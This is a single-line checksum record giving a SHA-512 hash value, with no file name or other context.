SHA512567274dce882fa193a6d57d44518bbea505b729f20e209c9885014c462cfe96fbdcde8e4775ae777d47468d4bd0b70c805a19abf2199bced5c0a8d5248e1bd45